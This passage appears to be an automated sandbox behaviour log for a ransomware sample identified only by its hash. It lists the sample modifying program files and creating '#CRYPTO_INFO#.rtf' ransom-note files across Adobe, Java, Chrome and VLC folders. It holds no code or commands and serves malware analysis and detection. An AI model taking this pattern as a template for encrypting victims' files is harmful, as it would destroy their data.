Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\cloud_secured.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bg.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ms.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javaws.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforcomments.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_partialselected-default_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\distribute_form.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\rmiregistry.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\Logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pt_BR.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\GRAY.pf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Mail\wabmig.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\desktop.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\OptimizePDF_R_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInTray.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\exportpdf-selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jrunscript.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\illustrations_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-tw_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\zx______.pfm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\ConvertToRequest.ram 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\cstm_brand_preview.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\pages-app-selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\serialver.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\editpdf.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Confirmation2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_super.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\about.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses_selected-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_shared_multi_filetype.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\calendars.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\ij 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\#CRYPTO_INFO#.rtf 